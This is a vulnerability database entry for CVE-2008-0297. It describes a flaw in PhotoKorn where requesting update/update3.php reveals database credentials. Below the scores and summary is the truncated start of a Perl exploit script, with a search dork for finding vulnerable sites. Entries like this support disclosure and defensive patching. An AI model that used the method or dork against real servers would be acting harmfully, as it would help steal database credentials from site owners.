5
CVSSv2

CVE-2008-0297

Published: 16/01/2008 Updated: 29/09/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

PhotoKorn allows remote malicious users to obtain database credentials via a direct request to update/update3.php, which includes the credentials in its output.

Vulnerable Product Search on Vulmon Subscribe to Product

keil software photokorn

Exploits

#!/usr/bin/perl #Script : PhotoKron All Version #All Version #Author : Pr0metheuS #Gr33tz to Gr33tz-Team #Gr33tz-TeamORG #Dork : "Powered by photokorn" ### INFO ## # Works IF /update/ is on server60% site are vulnerable ## INFO ## use LWP::UserAgent; if (@ARGV!=2) { print "-=-=-=-=-=-=-=-=-=-=-=--=\n"; print "PhotoKorn Remote Database ...